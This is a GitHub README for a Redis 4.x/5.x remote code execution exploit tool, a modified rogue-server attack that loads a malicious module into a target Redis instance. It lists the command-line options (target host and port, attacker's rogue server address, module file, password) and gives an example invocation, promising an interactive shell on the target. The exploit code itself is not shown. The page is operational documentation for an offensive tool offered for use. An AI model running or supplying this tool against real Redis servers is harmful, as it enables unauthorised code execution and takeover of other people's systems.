Skip to content

Latest commit

 

History

History
41 lines (30 loc) · 1.25 KB

README.md

File metadata and controls

41 lines (30 loc) · 1.25 KB

Redis RCE

A exploit for Redis 4.x/5.x RCE, inspired by Redis post-exploitation.

This repo is a modified version of https://github.com/n0b0dyCN/redis-rogue-server .

Usage:

Compile exp.so from https://github.com/RicterZ/RedisModules-ExecuteCommand.

usage: redis-rce.py [-h] -r RHOST [-p RPORT] -L LHOST [-P LPORT] [-f FILE]
                    [-a AUTH] [-v]

Redis 4.x/5.x RCE with RedisModules

optional arguments:
  -h, --help            show this help message and exit
  -r RHOST, --rhost RHOST
                        target host
  -p RPORT, --rport RPORT
                        target redis port, default 6379
  -L LHOST, --lhost LHOST
                        rogue server ip
  -P LPORT, --lport LPORT
                        rogue server listen port, default 21000
  -f FILE, --file FILE  RedisModules to load, default exp.so
  -a AUTH, --auth AUTH  redis password
  -v, --verbose         show more info

example:

python redis-rce.py -r 127.0.0.1 -L 127.0.0.1 -f exp.so

The default target port is 6379 and the default vps port is 21000.

And you will get an interactive shell!